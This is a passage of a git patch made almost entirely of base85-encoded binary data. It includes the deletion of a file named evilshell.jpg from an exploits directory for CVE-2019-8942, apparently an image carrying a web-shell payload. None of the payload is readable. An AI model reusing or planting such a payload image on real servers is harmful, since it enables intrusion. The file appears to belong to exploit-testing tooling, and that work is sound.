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 
diff --git a/data/exploits/CVE-2019-8942/evilshell.jpg b/data/exploits/CVE-2019-8942/evilshell.jpg deleted file mode 100644 index c14e57c7fd3d07851409debecfe5892157cc3301..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 11820 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 